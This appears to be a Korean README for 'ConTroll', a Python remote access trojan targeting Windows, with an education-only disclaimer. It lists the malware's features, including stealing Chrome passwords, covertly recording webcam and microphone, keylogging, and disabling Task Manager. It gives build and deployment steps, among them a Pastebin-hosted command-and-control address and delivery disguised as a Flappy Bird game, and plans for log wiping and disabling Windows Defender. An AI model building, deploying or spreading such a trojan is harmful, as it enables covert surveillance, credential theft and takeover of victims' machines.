
면책 조항
ConTroll은 교육/연구 목적으로만 사용됩니다. 작성자는 귀하가 ConTroll에 포함된 도구/소스 코드/파일을 사용하는 방법에 대해 어떠한 책임도 지지 않습니다. 작성자 및 관련자는 ConTroll과 함께 제공되는 어떤 파일의 사용과 관련된 손실 및/또는 손해에 대해 책임을 지지 않습니다. ConTroll 또는 포함된 파일을 사용함으로써 귀하는 본인의 책임 하에 사용하는 데 동의하는 것입니다.
다시 한번 말씀드리지만, ConTroll 및 포함된 모든 파일은 교육 및/또는 연구 목적으로만 사용됩니다. ConTroll은 오직 자신의 침투 테스트 랩에서만 사용하거나 테스트 대상 자산 소유자의 명시적 동의를 받은 경우에만 사용해야 합니다.
ConTroll - 원격 액세스 트로이 목마 (RAT)
프레젠테이션 동영상 보기
감염된 Windows 머신에 대한 관리 제어권을 확립하는 원격 액세스 트로이 목마를 만들었습니다.

영상 이후 업데이트 사항
- 클라이언트가 통신할 IP 주소 및 포트를 원격으로 업데이트
- 서버 실행 시 IP 주소 입력
- 작업 관리자 비활성화
기능
- 피해자 화면 잠금
- 서버에 자동 재연결
- 사용자 지정 팝업 상자 생성
- 피해자 머신에서 파일 가져오기
- 피해자 머신 정보 수집
- Chrome에 저장된 비밀번호 탈취
- 시스템 웹캠 활성화 및 비디오 녹화
- 시스템 마이크 활성화 및 오디오 녹음
- 피해자 머신에서 실행 중인 모든 프로세스 종료
- 키로거 기능(키 입력 및 스크린샷)을 통한 사용자 행동 모니터링
- 작업 관리자 비활성화 (경고: 로컬에서 실행 중인 경우 이 기능을 비활성화하는 것이 좋습니다)
요구 사항
바이너리를 빌드하려면 32비트 OS 아키텍처가 필요합니다. 따라서 코드를 실행하고 빌드하려면 Win 32 또는 Unix 32 시스템을 사용하세요.
- python 2.x
- opencv
- numpy
- pyhook
- pythoncom
- pyinstaller
- pygame
- py2exe
- pyAudio
사용법
신규
클라이언트가 응답을 보낼 IP 주소와 포트 번호를 포함하는 새 PASTE를 생성하려면 PASTEBIN 계정을 설정하세요. IP 주소와 포트 번호는 콜론으로 구분해야 합니다(예: 192.168.12.14:5000). 포스트를 생성한 후 RAW를 클릭하면 IP 주소와 포트 번호만 표시된 페이지로 리디렉션됩니다. 해당 링크를 복사하여 client.pyw의 getIpAddress 함수에 붙여넣으세요. 어떤 이유로든 클라이언트가 사용할 IP 또는 포트를 업데이트하려면 PASTEBIN 계정에 로그인하여 변경하고 저장하면 클라이언트가 해당 변경 사항을 적용합니다.
- 저장소 복제
git clone https://github.com/Lithium95/ConTroll_Remote_Access_Trojan.git
- requirements.txt에서 opencv 및 numpy 설치
python -m pip install -r requirements.txt
-
pyHook 다운로드 및 설치
-
pythoncom 다운로드 및 설치
-
pyAudio wheel 다운로드
-
wheel 파일 설치
python -m pip install PyAudio-0.2.11-cp27-cp27m-win32.whl
- pyinstaller를 사용하여 클라이언트 바이너리 빌드
python pyinstaller.py --onefile --windowed client.pyw
flappy bird 게임을 사용하지 않으려면 다음 2단계를 건너뛰세요.
- client.exe를 호스팅할 로컬 서버 설정. live-server 사용
- py2exe를 사용하여 flappy bird 게임 빌드
flappy bird 게임의 exe 파일은 'dist' 폴더에 있습니다.
- 서버 실행
- 클라이언트가 연결될 때까지 대기
할 일
- RAT를 크로스 플랫폼으로 만들기
- 시스템, 보안 및 애플리케이션 로그 지우기
- 서버와 클라이언트 간 통신 암호화
- 파일의 액세스, 생성 및 수정 속성 편집
- RDP, UAC 및 Windows Defender와 같은 서비스 활성화/비활성화